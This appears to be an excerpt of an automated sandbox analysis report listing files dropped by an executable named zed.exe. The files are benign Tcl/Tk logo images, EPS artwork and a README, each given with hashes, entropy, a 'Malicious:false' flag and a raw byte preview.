                                                                                                                                                                                                                                            SSDEEP:6:nVxpJFBmHdeA1xNZgk0dIf3Ju4dFi6/XWrWhr3W7FxmVFraazmVAJFKyVQR7icr8:nj5Bqf1fZgp6A4FDG6dm7FUGAJVVMRmn
                                                                                                                                                                                                                                            MD5:921245A21F7E783997DC7B859AF1B65B
                                                                                                                                                                                                                                            SHA1:2EFE3C8F70CF18621006890BF21CC097770D140D
                                                                                                                                                                                                                                            SHA-256:C6DB098EBD8A622164D37D4AB0A8C205DB1A83AC3065D5CDE3CB5FB61925D283
                                                                                                                                                                                                                                            SHA-512:CAD823FF3D13A64C00825961E75B5133690556FB1F622834F8B1DF316A9E75BABB63B9F5148DAE7B1391123B4C8D55B4B8B2EB6F8E6E1DA9DE02A5BD7AC0FD6F
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:README - images directory....This directory includes images for the Tcl Logo and the Tcl Powered..Logo. Please feel free to use the Tcl Powered Logo on any of your..products that employ the use of Tcl or Tk. The Tcl logo may also be..used to promote Tcl in your product documentation, web site or other..places you so desire...
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:PostScript document text conforming DSC level 3.0, type EPS
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):34991
                                                                                                                                                                                                                                            Entropy (8bit):5.248845410801251
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:768:0YrY6a0v4uIqYMEKjodQKOfRXMLcSqDGpfTKFVm3AsanMEDzzBHWzaw7XUbTJjoB:0YrY6aeIqYMEKjouzfRXMLcSqDGpfTKo
                                                                                                                                                                                                                                            MD5:23C4EDED40DEC065F99E6653AEE1BB31
                                                                                                                                                                                                                                            SHA1:3175E261BE198731DEDB07264CCB84C8DEDF7967
                                                                                                                                                                                                                                            SHA-256:76207D8DFDE189A29DC0E76ADB7EAAA606B96BC6C1C831F34D1C85B1C5B51DD3
                                                                                                                                                                                                                                            SHA-512:BA139A64BE72BB681040924C4294E2726BA5AB243E805E60A854D2D23E154705E2431D1AB2DE732BFA393747FD30D8A5C913895CBE1463DBF50CC23CAE5B0454
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:%!PS-Adobe-3.0 EPSF-3.0..%%Creator: Adobe Illustrator(TM) 5.5..%%For: (Bud Northern) (Mark Anderson Design)..%%Title: (TCL/TK LOGO.ILLUS)..%%CreationDate: (8/1/96) (4:58 PM)..%%BoundingBox: 251 331 371 512..%%HiResBoundingBox: 251.3386 331.5616 370.5213 511.775..%%DocumentProcessColors: Cyan Magenta Yellow..%%DocumentSuppliedResources: procset Adobe_level2_AI5 1.0 0..%%+ procset Adobe_IllustratorA_AI5 1.0 0..%AI5_FileFormat 1.2..%AI3_ColorUsage: Color..%%DocumentCustomColors: (TCL RED)..%%CMYKCustomColor: 0 0.45 1 0 (Orange)..%%+ 0 0.25 1 0 (Orange Yellow)..%%+ 0 0.79 0.91 0 (TCL RED)..%AI3_TemplateBox: 306 396 306 396..%AI3_TileBox: 12 12 600 780..%AI3_DocumentPreview: Macintosh_ColorPic..%AI5_ArtSize: 612 792..%AI5_RulerUnits: 0..%AI5_ArtFlags: 1 0 0 1 0 0 1 1 0..%AI5_TargetResolution: 800..%AI5_NumLayers: 1..%AI5_OpenToView: 90 576 2 938 673 18 1 1 2 40..%AI5_OpenViewLayers: 7..%%EndComments..%%BeginProlog..%%BeginResource: procset Adobe_level2_AI5 1.0 0..%%Title: (Adobe Illustrator
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:GIF image data, version 89a, 68 x 100
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2341
                                                                                                                                                                                                                                            Entropy (8bit):6.9734417899888665
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:qF/mIXn3l7+ejbL/4nZEsKPKer1OPQqVRqJbPpRRKOv/UVO47f:81nHL4T0KorxvRKkc847f
                                                                                                                                                                                                                                            MD5:FF04B357B7AB0A8B573C10C6DA945D6A
                                                                                                                                                                                                                                            SHA1:BCB73D8AF2628463A1B955581999C77F09F805B8
                                                                                                                                                                                                                                            SHA-256:72F6B34D3C8F424FF0A290A793FCFBF34FD5630A916CD02E0A5DDA0144B5957F
                                                                                                                                                                                                                                            SHA-512:10DFE631C5FC24CF239D817EEFA14329946E26ED6BCFC1B517E2F9AF81807977428BA2539AAA653A89A372257D494E8136FD6ABBC4F727E6B199400DE05ACCD5
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:GIF89aD.d...............f..3.............f..3..............f..3....f..f..f..ff.f3.f..3..3..3..3f.33.3............f..3..............f..3.............f..3..........f.3...f..f..f..ff.f3.f..3..3..3..3f.33.3............f..3.............f..3............f..3.............f..3....f..f.f..ff.f3.f..3..3.3..3f.33.3...........f..3...f..f..f..f.ff.3f..f..f..f.f.ff.3f..f..f..f..f.ff.3f..ff.ff.ff.fffff3ff.f3.f3.f3.f3ff33f3.f..f..f..f.ff.3f..3..3..3..3.f3.33..3..3..3.3.f3.33..3..3..3..3.f3.33..3f.3f.3f.3ff3f33f.33.33.33.33f33333.3..3..3..3.f3.33.............f..3.............f..3..............f..3....f..f..f..ff.f3.f..3..3..3..3f.33.3............f..3...............w..U..D..".....................w..U..D..".....................w..U..D..".................wwwUUUDDD"""......,....D.d........H......*\...z..Ht@Q...92.p...z.$.@@.E..u.Y.2..0c..q.cB.,[..... ..1..qbM.2~*].....s...S.@.L.j..#..\......h..........].D(..m......@.Z....oO...3=.c...G".(..pL...q]..%....[...#...+...X.h....^.....
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:GIF image data, version 89a, 43 x 64
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1670
                                                                                                                                                                                                                                            Entropy (8bit):6.326462043862671
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:PF/mIXn3l7+ejbL/4xsgq4sNC6JYp6s/pmp76F:/1nHL404raM/op2
                                                                                                                                                                                                                                            MD5:B226CC3DA70AAB2EBB8DFFD0C953933D
                                                                                                                                                                                                                                            SHA1:EA52219A37A140FD98AEA66EA54685DD8158D9B1
                                                                                                                                                                                                                                            SHA-256:138C240382304F350383B02ED56C69103A9431C0544EB1EC5DCD7DEC7A555DD9
                                                                                                                                                                                                                                            SHA-512:3D043F41B887D54CCADBF9E40E48D7FFF99B02B6FAF6B1DD0C6C6FEF0F8A17630252D371DE3C60D3EFBA80A974A0670AF3747E634C59BDFBC78544D878D498D4
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:GIF89a+.@...............f..3.............f..3..............f..3....f..f..f..ff.f3.f..3..3..3..3f.33.3............f..3..............f..3.............f..3..........f.3...f..f..f..ff.f3.f..3..3..3..3f.33.3............f..3.............f..3............f..3.............f..3....f..f.f..ff.f3.f..3..3.3..3f.33.3...........f..3...f..f..f..f.ff.3f..f..f..f.f.ff.3f..f..f..f..f.ff.3f..ff.ff.ff.fffff3ff.f3.f3.f3.f3ff33f3.f..f..f..f.ff.3f..3..3..3..3.f3.33..3..3..3.3.f3.33..3..3..3..3.f3.33..3f.3f.3f.3ff3f33f.33.33.33.33f33333.3..3..3..3.f3.33.............f..3.............f..3..............f..3....f..f..f..ff.f3.f..3..3..3..3f.33.3............f..3...............w..U..D..".....................w..U..D..".....................w..U..D..".................wwwUUUDDD"""......,....+.@........H. .z..(tp......@...92....#. A.......C.\.%...)Z..1a.8s..W/..@....3..C...y$.GW.....5.FU..j..;.F(Pc+W.-..X.D-[.*g....F..`.:mkT...Lw...A/.....u.7p..a..9P.....q2..Xg..G....3}AKv.\.d..yL.>..1.#
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:GIF image data, version 89a, 354 x 520
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):11000
                                                                                                                                                                                                                                            Entropy (8bit):7.88559092427108
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:d+nY6zludc/We/yXy9JHBUoIMSapQdrGlapzmyNMK1vbXkgMmgFW/KxIq3NhZe:YnY6p4c/OCHyowaGUaCcMK1vbXNwFW/l
                                                                                                                                                                                                                                            MD5:45D9B00C4CF82CC53723B00D876B5E7E
                                                                                                                                                                                                                                            SHA1:DDD10E798AF209EFCE022E97448E5EE11CEB5621
                                                                                                                                                                                                                                            SHA-256:0F404764D07A6AE2EF9E1E0E8EAAC278B7D488D61CF1C084146F2F33B485F2ED
                                                                                                                                                                                                                                            SHA-512:6E89DACF2077E1307DA05C16EF8FDE26E92566086346085BE10A7FD88658B9CDC87A3EC4D17504AF57D5967861B1652FA476B2DDD4D9C6BCFED9C60BB2B03B6F
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:GIF89ab.................f..3.............f..3..............f..3....f..f..f..ff.f3.f..3..3..3..3f.33.3............f..3..............f..3.............f..3..........f.3...f..f..f..ff.f3.f..3..3..3..3f.33.3............f..3.............f..3............f..3.............f..3....f..f.f..ff.f3.f..3..3.3..3f.33.3...........f..3...f..f..f..f.ff.3f..f..f..f.f.ff.3f..f..f..f..f.ff.3f..ff.ff.ff.fffff3ff.f3.f3.f3.f3ff33f3.f..f..f..f.ff.3f..3..3..3..3.f3.33..3..3..3.3.f3.33..3..3..3..3.f3.33..3f.3f.3f.3ff3f33f.33.33.33.33f33333.3..3..3..3.f3.33.............f..3.............f..3..............f..3....f..f..f..ff.f3.f..3..3..3..3f.33.3............f..3...............w..U..D..".....................w..U..D..".....................w..U..D..".................wwwUUUDDD"""......,....b..........H......*\....#J.H....3j.... '.;p....(.8X..^.0c.I...z8O.\.....:....$..Fu<8`...P.>%I.gO.C.h-..+.`....@..h....dJ.?...K...H.,U.._.#...g..[.*^.x.....J.L.!.'........=+eZ..i..ynF.8...].y|..m.
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:GIF image data, version 87a, 120 x 181
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):3889
                                                                                                                                                                                                                                            Entropy (8bit):7.425138719078912
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:9qqbIh+cE4C8ric/jxK5mxsFBu3/0GIJ6Qap1Y5uMiR8pw5rB/SgijDb+TOh:hy+mnZ7xK5IsTwDQmkdiiG5rB/BE+6h
                                                                                                                                                                                                                                            MD5:BD12B645A9B0036A9C24298CD7A81E5A
                                                                                                                                                                                                                                            SHA1:13488E4F28676F1E0CE383F80D13510F07198B99
                                                                                                                                                                                                                                            SHA-256:4D0BD3228AB4CC3E5159F4337BE969EC7B7334E265C99B7633E3DAF3C3FCFB62
                                                                                                                                                                                                                                            SHA-512:F62C996857CA6AD28C9C938E0F12106E0DF5A20D1B4B0B0D17F6294A112359BA82268961F2A054BD040B5FE4057F712206D02F2E668675BBCF6DA59A4DA0A1BB
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:GIF87ax............................................................................z.....{..o.....m..b...`{.X....vy...hk.Um.N...I`.D..Z^.LP.?R.;!....?C.5C.3#.l..,6.*&.15...`..#(.If.y.....l...._..#/...Hm.>_.y..4R.k..#6..._......w..*K.^.."<.....G{.w..3_."C.Q..F....v..!K...v.2m.)_.[..!R.u.1t.g..)f. X.O..E..1z.g. _.Z..D..:..0..Z.. f.D..0..'z..m.N..C../.z.svC.q/.m.ze7.\..P..I..1%.,...............................................................................................................................................................................................................................................................................................................................................................................................,....x..........H.......D..!...7.PAQ...._l8.... C.<.a...*.x....0q.. ..M.%.<.HBe.@.....Q..7..XC..P..<z3..X...P.jA.%'@.J.lV.......R.,..+....t....7h.....(..a...+^.'..7..L.....V...s..$....a.....8`.9..}K......
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:PostScript document text conforming DSC level 3.0, type EPS
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):29706
                                                                                                                                                                                                                                            Entropy (8bit):5.33387357427899
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:768:0warY6a0v4uIqYMEKjodQKOfRtMLcSqDGpf88KFVmlhEtOI/eE7U0a1:03rY6aeIqYMEKjouzfRtMLcSqDGpfbKc
                                                                                                                                                                                                                                            MD5:4AE11820D4D592D02CDE458E6F8CE518
                                                                                                                                                                                                                                            SHA1:A2E8D3D6191B336D43E48A65C3AE6485B07D93C6
                                                                                                                                                                                                                                            SHA-256:87FD9E46DBB5F2BF1529AFB411182C9FB9C58E23D830C66A233AF0C256BB8EFF
                                                                                                                                                                                                                                            SHA-512:E0AD4ED570D414BF00931B0F5BBB61FEF981ABDB22ECC42F8E9841905D38874CDFE38F22EDB17ACD0F7539B2932F9C4A865FA73A49BB1458CE05EE10A78BE357
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:%!PS-Adobe-3.0 EPSF-3.0..%%Creator: Adobe Illustrator(TM) 5.5..%%For: (Bud Northern) (Mark Anderson Design)..%%Title: (TCL PWRD LOGO.ILLUS)..%%CreationDate: (8/1/96) (4:59 PM)..%%BoundingBox: 242 302 377 513..%%HiResBoundingBox: 242.0523 302.5199 376.3322 512.5323..%%DocumentProcessColors: Cyan Magenta Yellow..%%DocumentSuppliedResources: procset Adobe_level2_AI5 1.0 0..%%+ procset Adobe_IllustratorA_AI5 1.0 0..%AI5_FileFormat 1.2..%AI3_ColorUsage: Color..%%CMYKCustomColor: 0 0.45 1 0 (Orange)..%%+ 0 0.25 1 0 (Orange Yellow)..%%+ 0 0.79 0.91 0 (PANTONE Warm Red CV)..%%+ 0 0.79 0.91 0 (TCL RED)..%AI3_TemplateBox: 306 396 306 396..%AI3_TileBox: 12 12 600 780..%AI3_DocumentPreview: Macintosh_ColorPic..%AI5_ArtSize: 612 792..%AI5_RulerUnits: 0..%AI5_ArtFlags: 1 0 0 1 0 0 1 1 0..%AI5_TargetResolution: 800..%AI5_NumLayers: 1..%AI5_OpenToView: 102 564 2 938 673 18 1 1 2 40..%AI5_OpenViewLayers: 7..%%EndComments..%%BeginProlog..%%BeginResource: procset Adobe_level2_AI5 1.0 0..%%Title: (Adobe I
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:GIF image data, version 89a, 64 x 100
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1615
                                                                                                                                                                                                                                            Entropy (8bit):7.461273815456419
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:aE45BzojC3r1WAQ+HT2gAdKhPFZ/ObchgB8:V5Gb1WN+yfcObmgW
                                                                                                                                                                                                                                            MD5:DBFAE61191B9FADD4041F4637963D84F
                                                                                                                                                                                                                                            SHA1:BD971E71AE805C2C2E51DD544D006E92363B6C0C
                                                                                                                                                                                                                                            SHA-256:BCC0E6458249433E8CBA6C58122B7C0EFA9557CBC8FB5F9392EED5D2579FC70B
                                                                                                                                                                                                                                            SHA-512:ACEAD81CC1102284ED7D9187398304F21B8287019EB98B0C4EC7398DD8B5BA8E7D19CAA891AA9E7C22017B73D734110096C8A7B41A070191223B5543C39E87AF
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:GIF89a@.d.............................f.................f...ff.f3.f..33.3.........f..ff.f3.33.3.f..f..ff.ff.ffff3ff333f.3f.33.33f.3...................................................................!.. -dl-.!.......,....@.d....@.pH,..E.... ..(...H$..v..j....K....q..5L......^).3.Y7..r..u.v|g..om...\iHl..p...`G..\~....fn[q...P.g.Z.l....y...\.l......f.Z.g...%%....e...e...)....O.f..e. ....O..qf..%..(.H.u..]..&....#4.......@.).....u!.M..2. ..PJ..#..T..a.....P.Gi... <Hb....x..z.3.X.O..f.........].Bt..lB.Q.r...9pP....&...L. ..,`[.....E6.Q.....?.#L......|g........N....[.._........."4......b....G6.........m.zI].....I.@.......I.9...glew...2.B..c>./..2....x.....<...{...7;.....y.I.....4G.Qj0..7..%.W.V...?!..[...X..=..k.h..[Q<.....0.B....(P.x.,.......8O*Z.8P!.$....u.c..Ea!..eC....CB.. .H..E..#..C..E...z..&.Nu........c.0..#.T.M.U........l.p @..s.|..pf!..&.......8.#.8.....*..J>. .t..h6(........#..0.A...*!..)...x..u.Z....*%..H.....*.......`......|.....1.......&.....T*...f.l...
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:GIF image data, version 89a, 97 x 150
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2489
                                                                                                                                                                                                                                            Entropy (8bit):7.708754027741608
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:/Ev7JJ+3uvz/Hwbcp7igaIwjBui7qFxIIOdJXcI+Ks:M9oWz/7pZAV7qPIImJXtXs
                                                                                                                                                                                                                                            MD5:711F4E22670FC5798E4F84250C0D0EAA
                                                                                                                                                                                                                                            SHA1:1A1582650E218B0BE6FFDEFFD64D27F4B9A9870F
                                                                                                                                                                                                                                            SHA-256:5FC25C30AEE76477F1C4E922931CC806823DF059525583FF5705705D9E913C1C
                                                                                                                                                                                                                                            SHA-512:220C36010208A87D0F674DA06D6F5B4D6101D196544ABCB4EE32378C46C781589DB1CE7C7DFE6471A8D8E388EE6A279DB237B18AF1EB9130FF9D0222578F1589
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:GIF89aa...............................f.................f...ff.f3.f..33.3............f..ff.f3.33.3.f..ff.ff.ffff3ff333f.3f.33.33f.3...................................................................!.. -dl-.!.......,....a......@.pH,...r.l:..TB.T..V..z..H.j..h...&.......t"....F...d..gN~Y...g....}..r....g.....o...g.......Y.w..W......N....Z....W....f...tL.~.f....New............W.M.r.........O.q........W-./i.*...`..z..F9.../9..-.......$6..G..S...........zB.,nw.64...e4.......HOt......f.....)..OX..C.eU.(.Qh.....T..<Q.Y.P.L.YxT....2........ji..3.^)zz..O.a..6 ...TZ........^...7.....>|P.....w$...k.ZF.\R.u....F.]Z.--(v+)[Y....=.!.W..+.]..]._.....&..../Ap...j...!..b.:...{.^.=.`...U.....@Hf..\?.(..Lq@.........0..L...a...&.!.....]#..]G \..q...A.H.X[...(.W......,...1a..B...W(.t.8.AdG.)..(P=...Uu.u..A.KM\...'r.R./.W..d2a.0..G...?...B......#H........1Q.0...R....%+...0.I..{.<......QV.tz'.yn.E.p..0i.I.g......L....%....K...A.l.ph.Q.1e...Z....g..2e...smU&d;.J..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:GIF image data, version 89a, 113 x 175
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2981
                                                                                                                                                                                                                                            Entropy (8bit):7.758793907956808
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:AmEwM8ioQoHJQBTThKVI7G78NLL120GFBBFXJRxlu+BmO/5lNqm7Eq:B57QoHJQt4II8BZ+jxluZO/5lNqm7Eq
                                                                                                                                                                                                                                            MD5:DA5FB10F4215E9A1F4B162257972F9F3
                                                                                                                                                                                                                                            SHA1:8DB7FB453B79B8F2B4E67AC30A4BA5B5BDDEBD3B
                                                                                                                                                                                                                                            SHA-256:62866E95501C436B329A15432355743C6EFD64A37CFB65BCECE465AB63ECF240
                                                                                                                                                                                                                                            SHA-512:990CF306F04A536E4F92257A07DA2D120877C00573BD0F7B17466D74E797D827F6C127E2BEAADB734A529254595918C3A5F54FDBD859BC325A162C8CD8F6F5BE
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:GIF89aq...............................f.................f...ff.f3.f..33.3............f..ff.f3.3f.33.3.f..ff.ff.ffff3ff333f.3f.33.33f.3................................................................!.. -dl-.!.......,....q......@.pH,...r.l:....A}H...v..R......D.VF..,%M....^.....fyzU.P..f...i.....t..Uqe..N..Z..i......~....g......u.....g......\...h.....P...h.....Q..g....Z..h......]......\...M...[..s...c2.+R.$. ......#.....)v..4....MO.b.....9......[.M.........h'..<-..=.....HQD....D?.~......W7. ..V.W0..l....*0p}..KP?c.\@KW.S(..M..B.....-q...S2...*.,..P.{....F..._MAn ....i.Y3............zh.y.j@...a876...ui.i..;K.........p...`.,}w....tv.m...Y..........;.;.e).e&.......-.NC.*4..(........*..F........[,w....f......E....h..a3.T.^.........)...C.N8.h\T...+&.z....g]H..B..#.t6..Z.....j.-..N......TI....A........M?..Q&V'...Mb.f.x...h.$r.U .9..Ci. ].4.Zb..@...X....%..<..b)V!........Y)x......T.....h.p.d..h..(........]@.**J.M.U.Jf...Y.:....F..g:..d..6q.-..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:GIF image data, version 89a, 130 x 200
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):3491
                                                                                                                                                                                                                                            Entropy (8bit):7.790611381196208
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:ROGuxkQ9mcV7RXcECEtqCa+6GK8WseNXhewFIp9ZmL4u:ROGwpVOEbqCrWsUhtIk4u
                                                                                                                                                                                                                                            MD5:A5E4284D75C457F7A33587E7CE0D1D99
                                                                                                                                                                                                                                            SHA1:FA98A0FD8910DF2EFB14EDAEC038B4E391FEAB3C
                                                                                                                                                                                                                                            SHA-256:BAD9116386343F4A4C394BDB87146E49F674F687D52BB847BD9E8198FDA382CC
                                                                                                                                                                                                                                            SHA-512:4448664925D1C1D9269567905D044BBA48163745646344E08203FCEF5BA1524BA7E03A8903A53DAF7D73FE0D9D820CC9063D4DA2AA1E08EFBF58524B1D69D359
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:GIF89a................................f.................f...ff.f3.f..33.3............f..ff.3f.33.3.f..ff.ff.ffff3ff333f.3f.33.33f.3...................................................................!.. -dl-.!.......,...........@.pH,...r.l:..T..F$XIe..V$.x..V.Z.z..F.pxd~..........{....o....l..{.b...hi[}P.k...y.....y.f.._R.\...............m.....y.....x......^.Q...j.....\S.....^.......l......]...[.......).....{....7...`..<...`..">..i.?/..@............>..Z.z@....0B..r...j.V.I.@..;%R...*...J.p.A.t.*..$A*...>`.....@g5BP.A..p.x.............q..8...... ...(.Q..#..@...F..YSK..M..#o.....D.m..-.....k}...BT..V......'.....`.d..~;..9+..6...<b.eZ..y^0]0..I...=.6.....}.0<.Z...M...Y1*35.e.....b...U0F~.-.HT......l2.s.q`-....y...e....dPZ....~.zT.M.... "r.E/k. ...*..Lj@'........Pcd&.(..mxF_w.."K..x!..--Y`..A.....Be.jH.A..\..j.....du#.....]^...>......].i.FMO..].9n1",Y...F...EW.9.....0TY.T...Cv!i`%...Hz@.]..U.!Y...#Dv&pi.z(.mn.A....@Q.0.%...&.4.v.cw(.`cd'|..M9..."...,*.......
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:GIF image data, version 89a, 48 x 75
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1171
                                                                                                                                                                                                                                            Entropy (8bit):7.289201491091023
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:DOfHIzP8hqiF+oyPOmp3XHhPBlMVvG0ffWLpfc:DGoPM+o0OmZXHhOv5WRc
                                                                                                                                                                                                                                            MD5:7013CFC23ED23BFF3BDA4952266FA7F4
                                                                                                                                                                                                                                            SHA1:E5B1DED49095332236439538ECD9DD0B1FD4934B
                                                                                                                                                                                                                                            SHA-256:462A8FF8FD051A8100E8C6C086F497E4056ACE5B20B44791F4AAB964B010A448
                                                                                                                                                                                                                                            SHA-512:A887A5EC33B82E4DE412564E86632D9A984E8498F02D8FE081CC4AC091A68DF6CC1A82F4BF99906CFB6EA9D0EF47ADAC2D1B0778DCB997FB24E62FC7A6D77D41
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:GIF89a0.K.............................f.................f...ff.f3.f..33.3.........f..ff.f3.3f.33.3.f..ff.ff.f3ff333f.3f.33.33f.3......................................................................!.. -dl-.!.......,....0.K....@.pH,...GD.<:..%SR.Z......<.V.$l.....z......:.. .|v[D..f...z.W.G.Vr...NgsU.yl..qU..`.......`fe`.......Fg....(.&...g.Y.. .."..q.V.$.'.Ez.W....y...Y.U...(#Xrf.........Xux.U..........(U.4...X....G.B..t..1S...R..Y. ...l ..".>.h......,%K....A.....<s....#..8.iK.....a.y$h..DQh.PE)....6.....MyL.qzF..... ."..Y0..a......2..*t..Ma..b...M..R.....\..st..=....Q......,>s`....Qt.,..B.R.....!.$..%.....(...s...B.T...`,".h(. D....8..dC..\Q.p.......x.#A.....:..du..(D.XV......7....S.#n8a....2`...f.:G,...==(......`!..$...t....b..../N|...f..J.x... P&.|.d._!N...].1w.3D.0!....@o&H...N.B.J....pz8..w.i....=r.............@5.-!.......H."..[.j.AB<..p....h...V.D..6.h...ab1F.g...I !.V~.H..V.........:.G..|c...,.....TD5..c[.W.....LC.....FJ..71[..lH.M.....8.:$......
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:GIF image data, version 89a, 100 x 100
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):5473
                                                                                                                                                                                                                                            Entropy (8bit):7.754239979431754
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:+EqG96vSGfyJZ26G6U1LI7nTD2enhjc+2VBnOqcUERVIim:+46KcyJI6G6uU7/LhjlkhQR7m
                                                                                                                                                                                                                                            MD5:048AFE69735F6974D2CA7384B879820C
                                                                                                                                                                                                                                            SHA1:267A9520C4390221DCE50177E789A4EBD590F484
                                                                                                                                                                                                                                            SHA-256:E538F8F4934CA6E1CE29416D292171F28E67DA6C72ED9D236BA42F37445EA41E
                                                                                                                                                                                                                                            SHA-512:201DA67A52DADA3AE7C533DE49D3C08A9465F7AA12317A0AE90A8C9C04AA69A85EC00AF2D0069023CD255DDA8768977C03C73516E4848376250E8D0D53D232CB
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:GIF89ad.d...................RJJ...B99.......RBB..B11ZBB!....R991!!...)....{{B!!R)).JJ.ss.ZZ.BB.kk.RR.JJ.BB9...JJR!!.ZZ.BB.11.99.{s.sk.kc.cZ.ZR.JB.ZR.JB.JB.RJ.B9.91.B9...{.JB.91.B9.B9.1){)!.)!.9)..ZR.JB{91.cR{1).ZJ.ZJ.RB.J9.B1.B1.9).1!....{B9.{k.scc1).kZZ)!c)!.9).B1.9).9).1!.1!.1!.B).9!.9!.1..).....{.sZ1)R)!.B1.B1.ZBR!..9).ZB.9).R9.R9.1!.J1.J1.B).B).9!.9!.1..1..).....sZ.J9.ZB.cJJ!.{1!.B).9!{)..9!.J).B!.B!.9..R1).kJ)!.B1{9).R9.cB.Z9.Z9.B).Z9.B).R1.9!.R1.J).J).B!.1..9....{.s.J9.{Z.ZB.sR.kJk1!.cB.cB.R1.R).1..B!.J!.B.....R91.J1).c.kJ.J).Z1.B!.B!..9!..{R.sJ.Z9.R1{9!..s.R9.Z...J91Z9){B)...............B91..1)!..............................RJR............B)1......R19........BJ.9B..{..s{......!.......,....d.d.@............0@PHa....*.p...7.8.y...C.s6Z.%Q.#s.`:B.N....4jd.K.0..|y....F@.......1~ ......'Y.B"C&R.V.R.4$k.3...D.......Ef*Y3..M........BDV._.....\..).]..>s..$H\%y0WL...d.......D..'..v..1Kz.Zp$;S
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2307
                                                                                                                                                                                                                                            Entropy (8bit):5.135743409565932
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:XU/zAcKT6yOCaDBfsHLk32s3J5w83KDyP1BXy3JQz7yuC:XNc+92sg3A8uyDXy3JQnDC
                                                                                                                                                                                                                                            MD5:F090D9B312C16489289FD39813412164
                                                                                                                                                                                                                                            SHA1:1BEC6668F6549771DADC67D153B89B8F77DCD4B9
                                                                                                                                                                                                                                            SHA-256:0D1E4405F6273F091732764ED89B57066BE63CE64869BE6C71EA337DC4F2F9B5
                                                                                                                                                                                                                                            SHA-512:57B323589C5A8D9CBB224416731D8CE65C4B94146DF15CE30885DF63B1D0B3F709093B65390A911F84F20B7C5DE3C0AF9B4D7D531742BE046EDA6E8C3432EF6E
                                                                                                                                                                                                                                            Malicious:false
